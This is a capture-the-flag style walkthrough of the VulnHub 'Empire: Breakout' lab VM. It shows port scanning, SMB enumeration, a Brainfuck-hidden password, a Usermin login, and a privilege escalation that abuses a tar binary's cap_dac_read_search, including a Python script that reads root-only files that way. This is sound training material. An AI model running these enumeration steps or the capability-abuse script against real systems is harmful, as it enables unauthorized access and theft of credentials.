Target download: https://www.vulnhub.com/entry/empire-breakout,751/
1. Host discovery and information gathering
(1) Information gathering
(2) Set an environment variable for the target
export ip=192.168.1.131
(3) Port scan
nmap --min-rate 10000 -p- $ip
PORT      STATE SERVICE
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
10000/tcp open  snet-sensor-mgmt
20000/tcp open  dnp
MAC Address: 00:0C:29:9F:48:84 (VMware)
(4) Service enumeration
nmap -sS -sV -O -p80,139,445,10000,20000 $ip
PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
139/tcp   open  netbios-ssn Samba smbd 4
445/tcp   open  netbios-ssn Samba smbd 4
10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
MAC Address: 00:0C:29:9F:48:84 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
(5) Vulnerability script scan (--script=vuln, not the default script set)
nmap --script=vuln -p80,139,445,10000,20000 $ip
┌──(root㉿kali)-[/home/kali]
└─# nmap --script=vuln -p80,139,445,10000,20000 $ip
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-03 03:26 EDT
Nmap scan report for 192.168.1.131
Host is up (0.00029s latency).

PORT      STATE SERVICE
80/tcp    open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.131
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://192.168.1.131:80/manual/es/index.html
|     Form id:
|     Form action: https://www.google.com/search
|
|     Path: http://192.168.1.131:80/manual/pt-br/index.html
|     Form id:
|     Form action: https://www.google.com/search
|
|     Path: http://192.168.1.131:80/manual/da/index.html
|     Form id:
|     Form action: https://www.google.com/search
|
|     Path: http://192.168.1.131:80/manual/fr/index.html
|     Form id:
|     Form action: https://www.google.com/search
|
|     Path: http://192.168.1.131:80/manual/de/index.html
|     Form id:
|     Form action: https://www.google.com/search
|
|     Path: http://192.168.1.131:80/manual/zh-cn/index.html
|     Form id:
|     Form action: https://www.google.com/search
|
|     Path: http://192.168.1.131:80/manual/ru/index.html
|     Form id:
|     Form action: https://www.google.com/search
|
|     Path: http://192.168.1.131:80/manual/tr/index.html
|     Form id:
|     Form action: https://www.google.com/search
|
|     Path: http://192.168.1.131:80/manual/ja/index.html
|     Form id:
|     Form action: https://www.google.com/search
|
|     Path: http://192.168.1.131:80/manual/en/index.html
|     Form id:
|     Form action: https://www.google.com/search
|
|     Path: http://192.168.1.131:80/manual/ko/index.html
|     Form id:
|_    Form action: https://www.google.com/search
| http-enum:
|_  /manual/: Potentially interesting folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
10000/tcp open  snet-sensor-mgmt
| http-vuln-cve2006-3392:
|   VULNERABLE:
|   Webmin File Disclosure
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2006-3392
|       Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
|       This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
|       to bypass the removal of "../" directory traversal sequences.
|
|     Disclosure date: 2006-06-29
|     References:
|       http://www.exploit-db.com/exploits/1997/
|       http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
20000/tcp open  dnp
MAC Address: 00:0C:29:9F:48:84 (VMware)

Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]

One caveat on this output: the http-vuln-cve2006-3392 hit on port 10000 contradicts the version scan (MiniServ 1.981, while CVE-2006-3392 affects Webmin before 1.290). The script matches on a response pattern, so treat it as a likely false positive; it is not used in this walkthrough. The SMB host scripts failed to negotiate a connection and tell us nothing either way.
2. Exploitation
(1) Port 80 web application
N-day check:
searchsploit Apache 2.4.51

No known exploits for this version.
Visiting the page
It is a default Apache landing page, useless on its own, but the page source contains something worth a look; after that we move on to directory brute-forcing.


++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
This is identified as Brainfuck code.
https://www.splitbrain.org/services/ook
Decoding it with the site above gives:
.2uqPEfj3D<P'a-3
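Instead of pasting the string into an online decoder, here is an added example (written for this page, not code from the original post) of a small Brainfuck interpreter together with a check for whether a blob scraped from HTML looks like Brainfuck at all. The only input it assumes is the string above, copied from the page source.

```python
"""Spot and decode a Brainfuck blob hidden in page source.
Added example for this walkthrough; not code from the original post."""

BF_OPS = frozenset("<>+-.,[]")

# The string found in the port-80 page source (copied from above).
BRAINFUCK_FROM_SOURCE = (
    "++++++++++[>+>+++>+++++++>++++++++++<<<<-]"
    ">>++++++++++++++++.++++."
    ">>+++++++++++++++++.----."
    "<++++++++++.-----------."
    ">-----------.++++."
    "<<+.>-.--------.++++++++++++++++++++."
    "<------------."
    ">>---------."
    "<<++++++.++++++."
)


def looks_like_brainfuck(text: str, min_len: int = 16) -> bool:
    """Heuristic for comments scraped from HTML: only the eight Brainfuck
    operators (whitespace ignored), long enough to matter, balanced brackets."""
    body = "".join(text.split())
    return (
        len(body) >= min_len
        and set(body) <= BF_OPS
        and body.count("[") == body.count("]")
    )


def run_brainfuck(program: str, tape_size: int = 30000) -> str:
    """Execute `program` and return everything it printed.

    Cells are 8-bit and wrap, as in the reference implementation; the tape
    pointer wraps around the tape so a stray '<' at cell 0 cannot crash us.
    Input (',') is not supported: nothing here reads stdin.
    """
    # Pre-compute bracket pairs so loops jump in O(1); also validates nesting.
    jumps, stack = {}, []
    for pos, op in enumerate(program):
        if op == "[":
            stack.append(pos)
        elif op == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {pos}")
            start = stack.pop()
            jumps[start], jumps[pos] = pos, start
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")

    tape = bytearray(tape_size)
    ptr = pc = 0
    out = []
    while pc < len(program):
        op = program[pc]
        if op == ">":
            ptr = (ptr + 1) % tape_size
        elif op == "<":
            ptr = (ptr - 1) % tape_size
        elif op == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif op == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif op == ".":
            out.append(chr(tape[ptr]))
        elif op == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif op == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        pc += 1  # any non-operator character (comment text) is skipped
    return "".join(out)


def decode_from_source(blob: str) -> str:
    """What you would run on a suspicious comment: decode only if it is Brainfuck."""
    if not looks_like_brainfuck(blob):
        raise ValueError("input does not look like Brainfuck")
    return run_brainfuck(blob)


if __name__ == "__main__":
    print(decode_from_source(BRAINFUCK_FROM_SOURCE))
```

The program only ever writes to four cells and uses a single counting loop, which is why it decodes to a short printable string; the bracket pre-pass is what makes the interpreter safe on longer or malformed input.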
Directory brute-forcing (optionally run through a proxy):
dirsearch -u http://192.168.1.131/
[03:50:43] 301 -  315B - /manual -> http://192.168.1.131/manual/
[03:50:43] 200 -  208B - /manual/index.html
Alternatively:
(2) Ports 139 and 445: SMB
Enumeration:
enum4linux -a 192.168.1.131
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Apr  3 09:47:43 2025

 =========================================( Target Information )=========================================

Target ........... 192.168.1.131
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ===========================( Enumerating Workgroup/Domain on 192.168.1.131 )===========================

[+] Got domain/workgroup name: WORKGROUP

 ===============================( Nbtstat Information for 192.168.1.131 )===============================

Looking up status of 192.168.1.131
        BREAKOUT        <00> -         B <ACTIVE>  Workstation Service
        BREAKOUT        <03> -         B <ACTIVE>  Messenger Service
        BREAKOUT        <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ===================================( Session Check on 192.168.1.131 )===================================

[+] Server 192.168.1.131 allows sessions using username '', password ''

 ================================( Getting domain SID for 192.168.1.131 )================================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup

 ==================================( OS information on 192.168.1.131 )==================================

[E] Can't get OS info with smbclient

[+] Got OS info for 192.168.1.131 from srvinfo:
        BREAKOUT       Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 =======================================( Users on 192.168.1.131 )=======================================

Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.

 =================================( Share Enumeration on 192.168.1.131 )=================================

smbXcli_negprot_smb1_done: No compatible protocol selected by server.

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Samba 4.13.5-Debian)
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 192.168.1.131 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.1.131

//192.168.1.131/print$  Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.1.131/IPC$    Mapping: N/A Listing: N/A Writing: N/A

 ===========================( Password Policy Information for 192.168.1.131 )===========================

[+] Attaching to 192.168.1.131 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
        [+] BREAKOUT
        [+] Builtin

[+] Password Info for Domain: BREAKOUT
        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes
        [+] Password Complexity Flags: 000000
                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0
        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes
        [+] Locked Account Duration: 30 minutes
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes

[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5

 ======================================( Groups on 192.168.1.131 )======================================

[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:

 ==================( Users on 192.168.1.131 via RID cycling (RIDS: 500-550,1000-1050) )==================

[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32

[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''
S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cyber (Local User)

 ===============================( Getting printer info for 192.168.1.131 )===============================

No printers returned.
enum4linux complete on Thu Apr  3 09:47:56 2025
RID cycling over the null session gives us a local Unix user: cyber
Try anonymous (null-session) access to the shares:
smbclient -L //192.168.1.131 -N
smbmap -H 192.168.1.131
Try an N-day:
searchsploit Samba 4.13.5-Debian
No results.
(3) Ports 10000 and 20000
One of them is the Usermin login page (port 20000):

The other is the Webmin login page (port 10000):

We now have a username (cyber, from SMB RID cycling) and a password (the decoded Brainfuck string from the page source):
cyber / .2uqPEfj3D<P'a-3
Logging in with them works and drops us into Usermin.

3. Initial access
Once logged in, Usermin gives us command execution straight away through its command shell module.


It is a perfectly usable interactive terminal, too.
4. Privilege escalation
Enumeration as the low-privileged user:
[cyber@breakout ~]$ ls -liah
total 568K
790814 drwxr-xr-x  8 cyber cyber 4.0K Apr  3 10:11 .
783372 drwxr-xr-x  3 root  root  4.0K Oct 19  2021 ..
791181 prw-r--r--  1 cyber cyber    0 Apr  3 10:11 backpipe
791183 -rw-------  1 cyber cyber    0 Oct 20  2021 .bash_history
790817 -rw-r--r--  1 cyber cyber  220 Oct 19  2021 .bash_logout
790816 -rw-r--r--  1 cyber cyber 3.5K Oct 19  2021 .bashrc
790841 drwxr-xr-x  2 cyber cyber 4.0K Oct 19  2021 .filemin
790838 drwx------  2 cyber cyber 4.0K Oct 19  2021 .gnupg
790853 drwxr-xr-x  3 cyber cyber 4.0K Oct 19  2021 .local
790815 -rw-r--r--  1 cyber cyber  807 Oct 19  2021 .profile
790830 drwx------  2 cyber cyber 4.0K Oct 19  2021 .spamassassin
791179 -rwxr-xr-x  1 root  root  520K Oct 19  2021 tar
790836 drwxr-xr-x  2 cyber cyber 4.0K Oct 20  2021 .tmp
790822 drwx------ 17 cyber cyber 4.0K Apr  3 10:02 .usermin
790857 -rw-r--r--  1 cyber cyber   48 Oct 19  2021 user.txt
[cyber@breakout ~]$ cat user.txt
3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
Besides the user flag, the home directory holds a root-owned executable named tar:
[cyber@breakout ~]$ ./tar
./tar: You must specify one of the '-Acdtrux', '--delete' or '--test-label' options
Try './tar --help' or './tar --usage' for more information.
[cyber@breakout ~]$ ./tar --usage
Usage: tar [-AcdrtuxGnSkUWOmpsMBiajJzZhPlRvwo?] [-g FILE] [-C DIR] [-T FILE] [-X FILE]
            [-f ARCHIVE] [-F NAME] [-L NUMBER] [-b BLOCKS] [-H FORMAT] [-V TEXT] [-I PROG]
            [-K MEMBER-NAME] [-N DATE-OR-FILE] [--catenate] [--concatenate] [--create]
            [--delete] [--diff] [--compare] [--append] [--test-label] [--list] [--update]
            [--extract] [--get] [--check-device] [--listed-incremental=FILE] [--incremental]
            [--hole-detection=TYPE] [--ignore-failed-read] [--level=NUMBER] [--no-check-device]
            [--no-seek] [--seek] [--occurrence[=NUMBER]] [--sparse-version=MAJOR[.MINOR]]
            [--sparse] [--add-file=FILE] [--directory=DIR] [--exclude=PATTERN]
            [--exclude-backups] [--exclude-caches] [--exclude-caches-all]
            [--exclude-caches-under] [--exclude-ignore=FILE] [--exclude-ignore-recursive=FILE]
            [--exclude-tag=FILE] [--exclude-tag-all=FILE] [--exclude-tag-under=FILE]
            [--exclude-vcs] [--exclude-vcs-ignores] [--no-null] [--no-recursion] [--no-unquote]
            [--no-verbatim-files-from] [--null] [--recursion] [--files-from=FILE] [--unquote]
            [--verbatim-files-from] [--exclude-from=FILE] [--anchored] [--ignore-case]
            [--no-anchored] [--no-ignore-case] [--no-wildcards] [--no-wildcards-match-slash]
            [--wildcards] [--wildcards-match-slash] [--keep-directory-symlink]
            [--keep-newer-files] [--keep-old-files] [--no-overwrite-dir] [--one-top-level[=DIR]]
            [--overwrite] [--overwrite-dir] [--recursive-unlink] [--remove-files]
            [--skip-old-files] [--unlink-first] [--verify] [--ignore-command-error]
            [--no-ignore-command-error] [--to-stdout] [--to-command=COMMAND]
            [--atime-preserve[=METHOD]] [--clamp-mtime] [--delay-directory-restore]
            [--group=NAME] [--group-map=FILE] [--mode=CHANGES] [--mtime=DATE-OR-FILE] [--touch]
            [--no-delay-directory-restore] [--no-same-owner] [--no-same-permissions]
            [--numeric-owner] [--owner=NAME] [--owner-map=FILE] [--preserve-permissions]
            [--same-permissions] [--same-owner] [--sort=ORDER] [--preserve-order] [--same-order]
            [--acls] [--no-acls] [--no-selinux] [--no-xattrs] [--selinux] [--xattrs]
            [--xattrs-exclude=MASK] [--xattrs-include=MASK] [--force-local] [--file=ARCHIVE]
            [--info-script=NAME] [--new-volume-script=NAME] [--tape-length=NUMBER]
            [--multi-volume] [--rmt-command=COMMAND] [--rsh-command=COMMAND] [--volno-file=FILE]
            [--blocking-factor=BLOCKS] [--read-full-records] [--ignore-zeros]
            [--record-size=NUMBER] [--format=FORMAT] [--gnu] [--oldgnu] [--pax] [--posix]
            [--ustar] [--v7] [--old-archive] [--portability]
            [--pax-option=keyword[[:]=value][,keyword[[:]=value]]...] [--posix] [--label=TEXT]
            [--auto-compress] [--use-compress-program=PROG] [--bzip2] [--xz] [--lzip] [--lzma]
            [--lzop] [--no-auto-compress] [--zstd] [--gzip] [--gunzip] [--ungzip] [--compress]
            [--uncompress] [--backup[=CONTROL]] [--hard-dereference] [--dereference]
            [--starting-file=MEMBER-NAME] [--newer-mtime=DATE] [--newer=DATE-OR-FILE]
            [--after-date=DATE-OR-FILE] [--one-file-system] [--absolute-names]
            [--suffix=STRING] [--strip-components=NUMBER] [--transform=EXPRESSION]
            [--xform=EXPRESSION] [--checkpoint[=NUMBER]] [--checkpoint-action=ACTION]
            [--full-time] [--index-file=FILE] [--check-links] [--no-quote-chars=STRING]
            [--quote-chars=STRING] [--quoting-style=STYLE] [--block-number] [--show-defaults]
            [--show-omitted-dirs] [--show-snapshot-field-ranges] [--show-transformed-names]
            [--show-stored-names] [--totals[=SIGNAL]] [--utc] [--verbose] [--warning=KEYWORD]
            [--interactive] [--confirmation] [--help] [--restrict] [--usage] [--version]
            [FILE]...
We can check the binary's file capabilities with getcap:
[cyber@breakout ~]$ getcap /home/cyber/tar
/home/cyber/tar cap_dac_read_search=ep
It carries cap_dac_read_search with the e (effective) and p (permitted) flags, so the capability is active the moment the binary is executed. CAP_DAC_READ_SEARCH bypasses file read permission checks and directory read/search permission checks; it does not grant write access (that would be CAP_DAC_OVERRIDE). Since the file is world-executable (-rwxr-xr-x, owned by root), any local user can use this tar to archive files they have no read permission on, then extract the archive and read the copy.
The usual move is to read /etc/shadow and crack the root hash, but here it simply would not crack.
So we keep looking for sensitive files, and find one under /var/backups:
/var/backups/.old_pass.bak
As cyber we have no permission on it, so we work from a directory we can write to, /tmp:
cd /tmp
1. Archive: /home/cyber/tar -cvf 1.tar /var/backups/.old_pass.bak
   (ls confirms that 1.tar was created)
2. Extract: /home/cyber/tar -xvf 1.tar
3. Read: cat /tmp/var/backups/.old_pass.bak
tar strips the leading / from member names, so the extracted copy lands under /tmp/var/backups/. That gives us the password:
Ts&4&YurgtRX(=~h
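The same capability abuse as the archive/extract/cat steps above, as an added example written for this page (not the author's commands): it drives the privileged tar from Python and parses the archive straight out of a pipe, so nothing is written to /tmp and no copy of the secret is left on disk for the next person to find. The binary path /home/cyber/tar and the target /var/backups/.old_pass.bak are taken from the post; run on your own machine it falls back to the system tar, which can only read what you can already read.

```python
"""Read a root-only file through a tar binary that carries
cap_dac_read_search, without writing an archive to disk.
Added example, not the post's own commands. Paths assumed from the post:
/home/cyber/tar (the capable binary) and /var/backups/.old_pass.bak."""

import io
import shutil
import subprocess
import sys
import tarfile
import tempfile
from pathlib import Path


def read_via_captar(tar_binary: str, target: str) -> bytes:
    """Return the contents of `target` as archived by `tar_binary`.

    The privileged tar performs the open(2) on `target`, so its
    CAP_DAC_READ_SEARCH, not our own DAC rights, decides access.
    `-cf -` streams the archive to stdout; we parse it in memory, so no
    world-writable directory like /tmp is needed and no extracted copy remains.
    """
    proc = subprocess.run(
        [tar_binary, "-cf", "-", target],
        stdout=subprocess.PIPE, stderr=subprocess.PIPE, check=False,
    )
    if proc.returncode != 0:
        # Typical when the binary lacks the capability:
        # "tar: /var/backups/.old_pass.bak: Cannot open: Permission denied"
        raise PermissionError(proc.stderr.decode(errors="replace").strip())
    with tarfile.open(fileobj=io.BytesIO(proc.stdout), mode="r:") as archive:
        # GNU tar strips the leading "/" (member is "var/backups/.old_pass.bak"),
        # so pick the first regular-file member instead of matching the path.
        for member in archive.getmembers():
            if member.isfile():
                return archive.extractfile(member).read()
    raise FileNotFoundError(f"{target} not present in archive")


def can_read(tar_binary: str, target: str) -> bool:
    """Quick probe: does this tar let us read `target` at all?"""
    try:
        read_via_captar(tar_binary, target)
        return True
    except (PermissionError, FileNotFoundError):
        return False


def roundtrip_locally(content: bytes) -> bytes:
    """Write `content` to a temp file and read it back through the system tar.

    Exercises the mechanics with an unprivileged tar; on the target you would
    call read_via_captar("/home/cyber/tar", "/var/backups/.old_pass.bak").
    """
    tar_binary = shutil.which("tar")
    if tar_binary is None:
        raise RuntimeError("no tar binary on PATH")
    with tempfile.TemporaryDirectory() as tmp:
        sample = Path(tmp) / "sample.bak"  # constructed sample input
        sample.write_bytes(content)
        return read_via_captar(tar_binary, str(sample))


if __name__ == "__main__":
    tar_bin = sys.argv[1] if len(sys.argv) > 1 else "/home/cyber/tar"
    target = sys.argv[2] if len(sys.argv) > 2 else "/var/backups/.old_pass.bak"
    sys.stdout.buffer.write(read_via_captar(tar_bin, target))
```

If the target has python3, save this as (say) read_via_captar.py and run python3 read_via_captar.py /home/cyber/tar /var/backups/.old_pass.bak. A non-zero exit from tar with "Cannot open: Permission denied" is the fastest sign that the binary does not actually carry the capability in effect (for example if it was copied, which drops file capabilities), which is worth checking before chasing a miss elsewhere.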
5. Privilege escalation
We have root's password, but neither su nor sudo is usable from this shell, so we need another way to spend it.
The way in is the web interface again: log out of cyber and log in as root, then check whether that really gives us root privileges. Webmin on port 10000 is the administrative side, so that is where root's credentials go:

root
Ts&4&YurgtRX(=~h

Privilege escalation successful.
Unless otherwise noted, all posts on this blog are the author's original work.
If you repost, please credit the source: https://www.oneblanks.xyz/empire-breakout%e9%9d%b6%e5%9c%ba%e7%bb%83%e4%b9%a0/